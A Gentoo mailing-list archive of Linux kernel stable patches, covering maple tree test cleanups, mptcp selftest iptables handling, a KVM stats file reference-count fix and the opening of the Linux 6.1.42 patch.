+ STORE, 140175956627456, 140175985139711,
+ 	};
+-	unsigned long set24[] = {
++	static const unsigned long set24[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140735281639424, 140737488351231,
+ SNULL, 140735281643519, 140737488351231,
+@@ -15508,7 +15509,7 @@ ERASE, 139635393024000, 139635401412607,
+ ERASE, 139635384627200, 139635384631295,
+ ERASE, 139635384631296, 139635393019903,
+ 	};
+-	unsigned long set25[] = {
++	static const unsigned long set25[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140737488343040, 140737488351231,
+ STORE, 140722547441664, 140737488351231,
+@@ -22296,7 +22297,7 @@ STORE, 140249652703232, 140249682087935,
+ STORE, 140249682087936, 140249710600191,
+ 	};
+ 
+-	unsigned long set26[] = {
++	static const unsigned long set26[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140729464770560, 140737488351231,
+ SNULL, 140729464774655, 140737488351231,
+@@ -22320,7 +22321,7 @@ ERASE, 140109040951296, 140109040959487,
+ STORE, 140109040955392, 140109040959487,
+ ERASE, 140109040955392, 140109040959487,
+ 	};
+-	unsigned long set27[] = {
++	static const unsigned long set27[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140726128070656, 140737488351231,
+ SNULL, 140726128074751, 140737488351231,
+@@ -22716,7 +22717,7 @@ STORE, 140415509696512, 140415535910911,
+ ERASE, 140415537422336, 140415562588159,
+ STORE, 140415482433536, 140415509696511,
+ 	};
+-	unsigned long set28[] = {
++	static const unsigned long set28[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140722475622400, 140737488351231,
+ SNULL, 140722475626495, 140737488351231,
+@@ -22784,7 +22785,7 @@ STORE, 139918413348864, 139918413352959,
+ ERASE, 139918413316096, 139918413344767,
+ STORE, 93865848528896, 93865848664063,
+ 	};
+-	unsigned long set29[] = {
++	static const unsigned long set29[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140734467944448, 140737488351231,
+ SNULL, 140734467948543, 140737488351231,
+@@ -23659,7 +23660,7 @@ ERASE, 140143079972864, 140143088361471,
+ ERASE, 140143205793792, 140143205797887,
+ ERASE, 140143205797888, 140143214186495,
+ 	};
+-	unsigned long set30[] = {
++	static const unsigned long set30[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140733436743680, 140737488351231,
+ SNULL, 140733436747775, 140737488351231,
+@@ -24541,7 +24542,7 @@ ERASE, 140165225893888, 140165225897983,
+ ERASE, 140165225897984, 140165234286591,
+ ERASE, 140165058105344, 140165058109439,
+ 	};
+-	unsigned long set31[] = {
++	static const unsigned long set31[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140730890784768, 140737488351231,
+ SNULL, 140730890788863, 140737488351231,
+@@ -25354,7 +25355,7 @@ ERASE, 140623906590720, 140623914979327,
+ ERASE, 140622950277120, 140622950281215,
+ ERASE, 140622950281216, 140622958669823,
+ 	};
+-	unsigned long set32[] = {
++	static const unsigned long set32[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140731244212224, 140737488351231,
+ SNULL, 140731244216319, 140737488351231,
+@@ -26150,7 +26151,7 @@ ERASE, 140400417288192, 140400425676799,
+ ERASE, 140400283066368, 140400283070463,
+ ERASE, 140400283070464, 140400291459071,
+ 	};
+-	unsigned long set33[] = {
++	static const unsigned long set33[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140734562918400, 140737488351231,
+ SNULL, 140734562922495, 140737488351231,
+@@ -26292,7 +26293,7 @@ STORE, 140582961786880, 140583003750399,
+ ERASE, 140582961786880, 140583003750399,
+ 	};
+ 
+-	unsigned long set34[] = {
++	static const unsigned long set34[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140731327180800, 140737488351231,
+ SNULL, 140731327184895, 140737488351231,
+@@ -27173,7 +27174,7 @@ ERASE, 140012522094592, 140012530483199,
+ ERASE, 140012033142784, 140012033146879,
+ ERASE, 140012033146880, 140012041535487,
+ 	};
+-	unsigned long set35[] = {
++	static const unsigned long set35[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140730536939520, 140737488351231,
+ SNULL, 140730536943615, 140737488351231,
+@@ -27930,7 +27931,7 @@ ERASE, 140474471936000, 140474480324607,
+ ERASE, 140474396430336, 140474396434431,
+ ERASE, 140474396434432, 140474404823039,
+ 	};
+-	unsigned long set36[] = {
++	static const unsigned long set36[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140723893125120, 140737488351231,
+ SNULL, 140723893129215, 140737488351231,
+@@ -28791,7 +28792,7 @@ ERASE, 140121890357248, 140121898745855,
+ ERASE, 140121269587968, 140121269592063,
+ ERASE, 140121269592064, 140121277980671,
+ 	};
+-	unsigned long set37[] = {
++	static const unsigned long set37[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140722404016128, 140737488351231,
+ SNULL, 140722404020223, 140737488351231,
+@@ -28917,7 +28918,7 @@ STORE, 139759821246464, 139759888355327,
+ ERASE, 139759821246464, 139759888355327,
+ ERASE, 139759888355328, 139759955464191,
+ 	};
+-	unsigned long set38[] = {
++	static const unsigned long set38[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140730666221568, 140737488351231,
+ SNULL, 140730666225663, 140737488351231,
+@@ -29727,7 +29728,7 @@ ERASE, 140613504712704, 140613504716799,
+ ERASE, 140613504716800, 140613513105407,
+ 	};
+ 
+-	unsigned long set39[] = {
++	static const unsigned long set39[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140736271417344, 140737488351231,
+ SNULL, 140736271421439, 140737488351231,
+@@ -30099,7 +30100,7 @@ STORE, 140325364428800, 140325372821503,
+ STORE, 140325356036096, 140325364428799,
+ SNULL, 140325364432895, 140325372821503,
+ 	};
+-	unsigned long set40[] = {
++	static const unsigned long set40[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140734309167104, 140737488351231,
+ SNULL, 140734309171199, 140737488351231,
+@@ -30850,7 +30851,7 @@ ERASE, 140320289300480, 140320289304575,
+ ERASE, 140320289304576, 140320297693183,
+ ERASE, 140320163409920, 140320163414015,
+ 	};
+-	unsigned long set41[] = {
++	static const unsigned long set41[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140728157171712, 140737488351231,
+ SNULL, 140728157175807, 140737488351231,
+@@ -31160,7 +31161,7 @@ STORE, 94376135090176, 94376135094271,
+ STORE, 94376135094272, 94376135098367,
+ SNULL, 94376135094272, 94377208836095,
+ 	};
+-	unsigned long set42[] = {
++	static const unsigned long set42[] = {
+ STORE, 314572800, 1388314623,
+ STORE, 1462157312, 1462169599,
+ STORE, 1462169600, 1462185983,
+@@ -33837,7 +33838,7 @@ SNULL, 3798999040, 3799101439,
+  */
+ 	};
+ 
+-	unsigned long set43[] = {
++	static const unsigned long set43[] = {
+ STORE, 140737488347136, 140737488351231,
+ STORE, 140734187720704, 140737488351231,
+ SNULL, 140734187724800, 140737488351231,
+@@ -34971,7 +34972,7 @@ void run_check_rcu_slowread(struct maple_tree *mt, struct rcu_test_struct *vals)
+ 	MT_BUG_ON(mt, !vals->seen_entry3);
+ 	MT_BUG_ON(mt, !vals->seen_both);
+ }
+-static noinline void check_rcu_simulated(struct maple_tree *mt)
++static noinline void __init check_rcu_simulated(struct maple_tree *mt)
+ {
+ 	unsigned long i, nr_entries = 1000;
+ 	unsigned long target = 4320;
+@@ -35132,7 +35133,7 @@ static noinline void check_rcu_simulated(struct maple_tree *mt)
+ 	rcu_unregister_thread();
+ }
+ 
+-static noinline void check_rcu_threaded(struct maple_tree *mt)
++static noinline void __init check_rcu_threaded(struct maple_tree *mt)
+ {
+ 	unsigned long i, nr_entries = 1000;
+ 	struct rcu_test_struct vals;
+@@ -35341,7 +35342,7 @@ static void check_dfs_preorder(struct maple_tree *mt)
+ /* End of depth first search tests */
+ 
+ /* Preallocation testing */
+-static noinline void check_prealloc(struct maple_tree *mt)
++static noinline void __init check_prealloc(struct maple_tree *mt)
+ {
+ 	unsigned long i, max = 100;
+ 	unsigned long allocated;
+@@ -35469,7 +35470,7 @@ static noinline void check_prealloc(struct maple_tree *mt)
+ /* End of preallocation testing */
+ 
+ /* Spanning writes, writes that span nodes and layers of the tree */
+-static noinline void check_spanning_write(struct maple_tree *mt)
++static noinline void __init check_spanning_write(struct maple_tree *mt)
+ {
+ 	unsigned long i, max = 5000;
+ 	MA_STATE(mas, mt, 1200, 2380);
+@@ -35637,7 +35638,7 @@ static noinline void check_spanning_write(struct maple_tree *mt)
+ /* End of spanning write testing */
+ 
+ /* Writes to a NULL area that are adjacent to other NULLs */
+-static noinline void check_null_expand(struct maple_tree *mt)
++static noinline void __init check_null_expand(struct maple_tree *mt)
+ {
+ 	unsigned long i, max = 100;
+ 	unsigned char data_end;
+@@ -35698,7 +35699,7 @@ static noinline void check_null_expand(struct maple_tree *mt)
+ /* End of NULL area expansions */
+ 
+ /* Checking for no memory is best done outside the kernel */
+-static noinline void check_nomem(struct maple_tree *mt)
++static noinline void __init check_nomem(struct maple_tree *mt)
+ {
+ 	MA_STATE(ms, mt, 1, 1);
+ 
+@@ -35733,7 +35734,7 @@ static noinline void check_nomem(struct maple_tree *mt)
+ 	mtree_destroy(mt);
+ }
+ 
+-static noinline void check_locky(struct maple_tree *mt)
++static noinline void __init check_locky(struct maple_tree *mt)
+ {
+ 	MA_STATE(ms, mt, 2, 2);
+ 	MA_STATE(reader, mt, 2, 2);
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_join.sh b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+index 7b65003ee8cff..a3108c3cff471 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_join.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+@@ -151,9 +151,7 @@ check_tools()
+ 	elif ! iptables -V &> /dev/null; then
+ 		echo "SKIP: Could not run all tests without iptables tool"
+ 		exit $ksft_skip
+-	fi
+-
+-	if ! ip6tables -V &> /dev/null; then
++	elif ! ip6tables -V &> /dev/null; then
+ 		echo "SKIP: Could not run all tests without ip6tables tool"
+ 		exit $ksft_skip
+ 	fi
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_sockopt.sh b/tools/testing/selftests/net/mptcp/mptcp_sockopt.sh
+index af4fccd4f5cc0..114c4ce719c78 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_sockopt.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_sockopt.sh
+@@ -13,13 +13,15 @@ timeout_poll=30
+ timeout_test=$((timeout_poll * 2 + 1))
+ mptcp_connect=""
+ do_all_tests=1
++iptables="iptables"
++ip6tables="ip6tables"
+ 
+ add_mark_rules()
+ {
+ 	local ns=$1
+ 	local m=$2
+ 
+-	for t in iptables ip6tables; do
++	for t in ${iptables} ${ip6tables}; do
+ 		# just to debug: check we have multiple subflows connection requests
+ 		ip netns exec $ns $t -A OUTPUT -p tcp --syn -m mark --mark $m -j ACCEPT
+ 
+@@ -92,14 +94,14 @@ if [ $? -ne 0 ];then
+ 	exit $ksft_skip
+ fi
+ 
+-iptables -V > /dev/null 2>&1
+-if [ $? -ne 0 ];then
++# Use the legacy version if available to support old kernel versions
++if iptables-legacy -V &> /dev/null; then
++	iptables="iptables-legacy"
++	ip6tables="ip6tables-legacy"
++elif ! iptables -V &> /dev/null; then
+ 	echo "SKIP: Could not run all tests without iptables tool"
+ 	exit $ksft_skip
+-fi
+-
+-ip6tables -V > /dev/null 2>&1
+-if [ $? -ne 0 ];then
++elif ! ip6tables -V &> /dev/null; then
+ 	echo "SKIP: Could not run all tests without ip6tables tool"
+ 	exit $ksft_skip
+ fi
+@@ -109,10 +111,10 @@ check_mark()
+ 	local ns=$1
+ 	local af=$2
+ 
+-	tables=iptables
++	tables=${iptables}
+ 
+ 	if [ $af -eq 6 ];then
+-		tables=ip6tables
++		tables=${ip6tables}
+ 	fi
+ 
+ 	counters=$(ip netns exec $ns $tables -v -L OUTPUT | grep DROP)
+@@ -314,8 +316,8 @@ do_tcpinq_tests()
+ {
+ 	local lret=0
+ 
+-	ip netns exec "$ns1" iptables -F
+-	ip netns exec "$ns1" ip6tables -F
++	ip netns exec "$ns1" ${iptables} -F
++	ip netns exec "$ns1" ${ip6tables} -F
+ 
+ 	if ! mptcp_lib_kallsyms_has "mptcp_ioctl$"; then
+ 		echo "INFO: TCP_INQ not supported: SKIP"
+diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
+index 640113f047efb..8123f4d15930c 100644
+--- a/virt/kvm/kvm_main.c
++++ b/virt/kvm/kvm_main.c
+@@ -4032,8 +4032,17 @@ static ssize_t kvm_vcpu_stats_read(struct file *file, char __user *user_buffer,
+ 			sizeof(vcpu->stat), user_buffer, size, offset);
+ }
+ 
++static int kvm_vcpu_stats_release(struct inode *inode, struct file *file)
++{
++	struct kvm_vcpu *vcpu = file->private_data;
++
++	kvm_put_kvm(vcpu->kvm);
++	return 0;
++}
++
+ static const struct file_operations kvm_vcpu_stats_fops = {
+ 	.read = kvm_vcpu_stats_read,
++	.release = kvm_vcpu_stats_release,
+ 	.llseek = noop_llseek,
+ };
+ 
+@@ -4054,6 +4063,9 @@ static int kvm_vcpu_ioctl_get_stats_fd(struct kvm_vcpu *vcpu)
+ 		put_unused_fd(fd);
+ 		return PTR_ERR(file);
+ 	}
++
++	kvm_get_kvm(vcpu->kvm);
++
+ 	file->f_mode |= FMODE_PREAD;
+ 	fd_install(fd, file);
+ 
+@@ -4658,8 +4670,17 @@ static ssize_t kvm_vm_stats_read(struct file *file, char __user *user_buffer,
+ 				sizeof(kvm->stat), user_buffer, size, offset);
+ }
+ 
++static int kvm_vm_stats_release(struct inode *inode, struct file *file)
++{
++	struct kvm *kvm = file->private_data;
++
++	kvm_put_kvm(kvm);
++	return 0;
++}
++
+ static const struct file_operations kvm_vm_stats_fops = {
+ 	.read = kvm_vm_stats_read,
++	.release = kvm_vm_stats_release,
+ 	.llseek = noop_llseek,
+ };
+ 
+@@ -4678,6 +4699,9 @@ static int kvm_vm_ioctl_get_stats_fd(struct kvm *kvm)
+ 		put_unused_fd(fd);
+ 		return PTR_ERR(file);
+ 	}
++
++	kvm_get_kvm(kvm);
++
+ 	file->f_mode |= FMODE_PREAD;
+ 	fd_install(fd, file);
+ 


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-07-27 11:48 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-07-27 11:48 UTC (permalink / raw
  To: gentoo-commits

commit:     7fc5f7e1d44539fdcbdbe79b07208182a3ea5888
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Jul 27 11:47:30 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Jul 27 11:47:30 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=7fc5f7e1

Linux patch 6.1.42

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1041_linux-6.1.42.patch | 9816 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 9820 insertions(+)

diff --git a/0000_README b/0000_README
index 3a1ce4bc..e4fa9ccf 100644
--- a/0000_README
+++ b/0000_README
@@ -207,6 +207,10 @@ Patch:  1040_linux-6.1.41.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.41
 
+Patch:  1041_linux-6.1.42.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.42
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1041_linux-6.1.42.patch b/1041_linux-6.1.42.patch
new file mode 100644
index 00000000..4508ec48
--- /dev/null
+++ b/1041_linux-6.1.42.patch
@@ -0,0 +1,9816 @@
+diff --git a/Documentation/accounting/psi.rst b/Documentation/accounting/psi.rst
+index 5e40b3f437f90..df6062eb3abbc 100644
+--- a/Documentation/accounting/psi.rst
++++ b/Documentation/accounting/psi.rst
+@@ -105,6 +105,10 @@ prevent overly frequent polling. Max limit is chosen as a high enough number
+ after which monitors are most likely not needed and psi averages can be used
+ instead.
+ 
++Unprivileged users can also create monitors, with the only limitation that the
++window size must be a multiple of 2s, in order to prevent excessive resource
++usage.
++
+ When activated, psi monitor stays active for at least the duration of one
+ tracking window to avoid repeated activations/deactivations when system is
+ bouncing in and out of the stall state.
+diff --git a/Makefile b/Makefile
+index 6c940cce3656a..b569bed800521 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 41
++SUBLEVEL = 42
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/kernel/fpsimd.c b/arch/arm64/kernel/fpsimd.c
+index 23834d96d1e78..656f613bacf7a 100644
+--- a/arch/arm64/kernel/fpsimd.c
++++ b/arch/arm64/kernel/fpsimd.c
+@@ -803,6 +803,8 @@ void sve_sync_from_fpsimd_zeropad(struct task_struct *task)
+ int vec_set_vector_length(struct task_struct *task, enum vec_type type,
+ 			  unsigned long vl, unsigned long flags)
+ {
++	bool free_sme = false;
++
+ 	if (flags & ~(unsigned long)(PR_SVE_VL_INHERIT |
+ 				     PR_SVE_SET_VL_ONEXEC))
+ 		return -EINVAL;
+@@ -851,21 +853,36 @@ int vec_set_vector_length(struct task_struct *task, enum vec_type type,
+ 	    thread_sm_enabled(&task->thread))
+ 		sve_to_fpsimd(task);
+ 
+-	if (system_supports_sme() && type == ARM64_VEC_SME) {
+-		task->thread.svcr &= ~(SVCR_SM_MASK |
+-				       SVCR_ZA_MASK);
+-		clear_thread_flag(TIF_SME);
++	if (system_supports_sme()) {
++		if (type == ARM64_VEC_SME ||
++		    !(task->thread.svcr & (SVCR_SM_MASK | SVCR_ZA_MASK))) {
++			/*
++			 * We are changing the SME VL or weren't using
++			 * SME anyway, discard the state and force a
++			 * reallocation.
++			 */
++			task->thread.svcr &= ~(SVCR_SM_MASK |
++					       SVCR_ZA_MASK);
++			clear_thread_flag(TIF_SME);
++			free_sme = true;
++		}
+ 	}
+ 
+ 	if (task == current)
+ 		put_cpu_fpsimd_context();
+ 
+ 	/*
+-	 * Force reallocation of task SVE and SME state to the correct
+-	 * size on next use:
++	 * Free the changed states if they are not in use, SME will be
++	 * reallocated to the correct size on next use and we just
++	 * allocate SVE now in case it is needed for use in streaming
++	 * mode.
+ 	 */
+-	sve_free(task);
+-	if (system_supports_sme() && type == ARM64_VEC_SME)
++	if (system_supports_sve()) {
++		sve_free(task);
++		sve_alloc(task, true);
++	}
++
++	if (free_sme)
+ 		sme_free(task);
+ 
+ 	task_set_vl(task, type, vl);
+diff --git a/arch/arm64/net/bpf_jit_comp.c b/arch/arm64/net/bpf_jit_comp.c
+index 8f16217c111c8..14134fd34ff79 100644
+--- a/arch/arm64/net/bpf_jit_comp.c
++++ b/arch/arm64/net/bpf_jit_comp.c
+@@ -322,7 +322,13 @@ static int build_prologue(struct jit_ctx *ctx, bool ebpf_from_cbpf)
+ 	 *
+ 	 */
+ 
+-	emit_bti(A64_BTI_C, ctx);
++	/* bpf function may be invoked by 3 instruction types:
++	 * 1. bl, attached via freplace to bpf prog via short jump
++	 * 2. br, attached via freplace to bpf prog via long jump
++	 * 3. blr, working as a function pointer, used by emit_call.
++	 * So BTI_JC should used here to support both br and blr.
++	 */
++	emit_bti(A64_BTI_JC, ctx);
+ 
+ 	emit(A64_MOV(1, A64_R(9), A64_LR), ctx);
+ 	emit(A64_NOP, ctx);
+diff --git a/arch/mips/include/asm/dec/prom.h b/arch/mips/include/asm/dec/prom.h
+index 1e1247add1cf8..908e96e3a3117 100644
+--- a/arch/mips/include/asm/dec/prom.h
++++ b/arch/mips/include/asm/dec/prom.h
+@@ -70,7 +70,7 @@ static inline bool prom_is_rex(u32 magic)
+  */
+ typedef struct {
+ 	int pagesize;
+-	unsigned char bitmap[0];
++	unsigned char bitmap[];
+ } memmap;
+ 
+ 
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index b6d429a2bcb62..707d6811615b8 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -510,6 +510,14 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 		DMI_MATCH(DMI_PRODUCT_NAME, "Precision 7510"),
+ 		},
+ 	},
++	{
++	 .callback = video_detect_force_native,
++	 /* Dell Studio 1569 */
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "Dell Inc."),
++		DMI_MATCH(DMI_PRODUCT_NAME, "Studio 1569"),
++		},
++	},
+ 	{
+ 	 .callback = video_detect_force_native,
+ 	 /* Acer Aspire 3830TG */
+diff --git a/drivers/base/regmap/regmap-i2c.c b/drivers/base/regmap/regmap-i2c.c
+index 980e5ce6a3a35..3ec611dc0c09f 100644
+--- a/drivers/base/regmap/regmap-i2c.c
++++ b/drivers/base/regmap/regmap-i2c.c
+@@ -242,8 +242,8 @@ static int regmap_i2c_smbus_i2c_read(void *context, const void *reg,
+ static const struct regmap_bus regmap_i2c_smbus_i2c_block = {
+ 	.write = regmap_i2c_smbus_i2c_write,
+ 	.read = regmap_i2c_smbus_i2c_read,
+-	.max_raw_read = I2C_SMBUS_BLOCK_MAX,
+-	.max_raw_write = I2C_SMBUS_BLOCK_MAX,
++	.max_raw_read = I2C_SMBUS_BLOCK_MAX - 1,
++	.max_raw_write = I2C_SMBUS_BLOCK_MAX - 1,
+ };
+ 
+ static int regmap_i2c_smbus_i2c_write_reg16(void *context, const void *data,
+@@ -299,8 +299,8 @@ static int regmap_i2c_smbus_i2c_read_reg16(void *context, const void *reg,
+ static const struct regmap_bus regmap_i2c_smbus_i2c_block_reg16 = {
+ 	.write = regmap_i2c_smbus_i2c_write_reg16,
+ 	.read = regmap_i2c_smbus_i2c_read_reg16,
+-	.max_raw_read = I2C_SMBUS_BLOCK_MAX,
+-	.max_raw_write = I2C_SMBUS_BLOCK_MAX,
++	.max_raw_read = I2C_SMBUS_BLOCK_MAX - 2,
++	.max_raw_write = I2C_SMBUS_BLOCK_MAX - 2,
+ };
+ 
+ static const struct regmap_bus *regmap_get_i2c_bus(struct i2c_client *i2c,
+diff --git a/drivers/base/regmap/regmap-spi-avmm.c b/drivers/base/regmap/regmap-spi-avmm.c
+index 6af692844c196..4c2b94b3e30be 100644
+--- a/drivers/base/regmap/regmap-spi-avmm.c
++++ b/drivers/base/regmap/regmap-spi-avmm.c
+@@ -660,7 +660,7 @@ static const struct regmap_bus regmap_spi_avmm_bus = {
+ 	.reg_format_endian_default = REGMAP_ENDIAN_NATIVE,
+ 	.val_format_endian_default = REGMAP_ENDIAN_NATIVE,
+ 	.max_raw_read = SPI_AVMM_VAL_SIZE * MAX_READ_CNT,
+-	.max_raw_write = SPI_AVMM_REG_SIZE + SPI_AVMM_VAL_SIZE * MAX_WRITE_CNT,
++	.max_raw_write = SPI_AVMM_VAL_SIZE * MAX_WRITE_CNT,
+ 	.free_context = spi_avmm_bridge_ctx_free,
+ };
+ 
+diff --git a/drivers/base/regmap/regmap.c b/drivers/base/regmap/regmap.c
+index 8359164bff903..7de1f27d0323d 100644
+--- a/drivers/base/regmap/regmap.c
++++ b/drivers/base/regmap/regmap.c
+@@ -2064,8 +2064,6 @@ int _regmap_raw_write(struct regmap *map, unsigned int reg,
+ 	size_t val_count = val_len / val_bytes;
+ 	size_t chunk_count, chunk_bytes;
+ 	size_t chunk_regs = val_count;
+-	size_t max_data = map->max_raw_write - map->format.reg_bytes -
+-			map->format.pad_bytes;
+ 	int ret, i;
+ 
+ 	if (!val_count)
+@@ -2073,8 +2071,8 @@ int _regmap_raw_write(struct regmap *map, unsigned int reg,
+ 
+ 	if (map->use_single_write)
+ 		chunk_regs = 1;
+-	else if (map->max_raw_write && val_len > max_data)
+-		chunk_regs = max_data / val_bytes;
++	else if (map->max_raw_write && val_len > map->max_raw_write)
++		chunk_regs = map->max_raw_write / val_bytes;
+ 
+ 	chunk_count = val_count / chunk_regs;
+ 	chunk_bytes = chunk_regs * val_bytes;
+diff --git a/drivers/dma-buf/dma-resv.c b/drivers/dma-buf/dma-resv.c
+index e3885c90a3acb..f1ba71aed33c3 100644
+--- a/drivers/dma-buf/dma-resv.c
++++ b/drivers/dma-buf/dma-resv.c
+@@ -566,6 +566,7 @@ int dma_resv_get_fences(struct dma_resv *obj, enum dma_resv_usage usage,
+ 	dma_resv_for_each_fence_unlocked(&cursor, fence) {
+ 
+ 		if (dma_resv_iter_is_restarted(&cursor)) {
++			struct dma_fence **new_fences;
+ 			unsigned int count;
+ 
+ 			while (*num_fences)
+@@ -574,13 +575,17 @@ int dma_resv_get_fences(struct dma_resv *obj, enum dma_resv_usage usage,
+ 			count = cursor.num_fences + 1;
+ 
+ 			/* Eventually re-allocate the array */
+-			*fences = krealloc_array(*fences, count,
+-						 sizeof(void *),
+-						 GFP_KERNEL);
+-			if (count && !*fences) {
++			new_fences = krealloc_array(*fences, count,
++						    sizeof(void *),
++						    GFP_KERNEL);
++			if (count && !new_fences) {
++				kfree(*fences);
++				*fences = NULL;
++				*num_fences = 0;
+ 				dma_resv_iter_end(&cursor);
+ 				return -ENOMEM;
+ 			}
++			*fences = new_fences;
+ 		}
+ 
+ 		(*fences)[(*num_fences)++] = dma_fence_get(fence);
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vkms.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vkms.c
+index 500a1dc4fe029..d60c4a2eeb0c5 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vkms.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vkms.c
+@@ -55,8 +55,9 @@ static enum hrtimer_restart amdgpu_vkms_vblank_simulate(struct hrtimer *timer)
+ 		DRM_WARN("%s: vblank timer overrun\n", __func__);
+ 
+ 	ret = drm_crtc_handle_vblank(crtc);
++	/* Don't queue timer again when vblank is disabled. */
+ 	if (!ret)
+-		DRM_ERROR("amdgpu_vkms failure on handling vblank");
++		return HRTIMER_NORESTART;
+ 
+ 	return HRTIMER_RESTART;
+ }
+@@ -81,7 +82,7 @@ static void amdgpu_vkms_disable_vblank(struct drm_crtc *crtc)
+ {
+ 	struct amdgpu_crtc *amdgpu_crtc = to_amdgpu_crtc(crtc);
+ 
+-	hrtimer_cancel(&amdgpu_crtc->vblank_timer);
++	hrtimer_try_to_cancel(&amdgpu_crtc->vblank_timer);
+ }
+ 
+ static bool amdgpu_vkms_get_vblank_timestamp(struct drm_crtc *crtc,
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index b854eec2787e2..ce5df7927c21f 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -40,6 +40,9 @@
+ #include "dc/dc_stat.h"
+ #include "amdgpu_dm_trace.h"
+ #include "dc/inc/dc_link_ddc.h"
++#include "dpcd_defs.h"
++#include "dc/inc/link_dpcd.h"
++#include "link_service_types.h"
+ 
+ #include "vid.h"
+ #include "amdgpu.h"
+@@ -211,7 +214,7 @@ static void amdgpu_dm_destroy_drm_device(struct amdgpu_display_manager *dm);
+ 
+ static int amdgpu_dm_connector_init(struct amdgpu_display_manager *dm,
+ 				    struct amdgpu_dm_connector *amdgpu_dm_connector,
+-				    uint32_t link_index,
++				    u32 link_index,
+ 				    struct amdgpu_encoder *amdgpu_encoder);
+ static int amdgpu_dm_encoder_init(struct drm_device *dev,
+ 				  struct amdgpu_encoder *aencoder,
+@@ -263,7 +266,7 @@ static u32 dm_vblank_get_counter(struct amdgpu_device *adev, int crtc)
+ static int dm_crtc_get_scanoutpos(struct amdgpu_device *adev, int crtc,
+ 				  u32 *vbl, u32 *position)
+ {
+-	uint32_t v_blank_start, v_blank_end, h_position, v_position;
++	u32 v_blank_start, v_blank_end, h_position, v_position;
+ 
+ 	if ((crtc < 0) || (crtc >= adev->mode_info.num_crtc))
+ 		return -EINVAL;
+@@ -391,7 +394,7 @@ static void dm_pflip_high_irq(void *interrupt_params)
+ 	struct amdgpu_device *adev = irq_params->adev;
+ 	unsigned long flags;
+ 	struct drm_pending_vblank_event *e;
+-	uint32_t vpos, hpos, v_blank_start, v_blank_end;
++	u32 vpos, hpos, v_blank_start, v_blank_end;
+ 	bool vrr_active;
+ 
+ 	amdgpu_crtc = get_crtc_by_otg_inst(adev, irq_params->irq_src - IRQ_TYPE_PFLIP);
+@@ -405,12 +408,12 @@ static void dm_pflip_high_irq(void *interrupt_params)
+ 
+ 	spin_lock_irqsave(&adev_to_drm(adev)->event_lock, flags);
+ 
+-	if (amdgpu_crtc->pflip_status != AMDGPU_FLIP_SUBMITTED){
+-		DC_LOG_PFLIP("amdgpu_crtc->pflip_status = %d !=AMDGPU_FLIP_SUBMITTED(%d) on crtc:%d[%p] \n",
+-						 amdgpu_crtc->pflip_status,
+-						 AMDGPU_FLIP_SUBMITTED,
+-						 amdgpu_crtc->crtc_id,
+-						 amdgpu_crtc);
++	if (amdgpu_crtc->pflip_status != AMDGPU_FLIP_SUBMITTED) {
++		DC_LOG_PFLIP("amdgpu_crtc->pflip_status = %d !=AMDGPU_FLIP_SUBMITTED(%d) on crtc:%d[%p]\n",
++			     amdgpu_crtc->pflip_status,
++			     AMDGPU_FLIP_SUBMITTED,
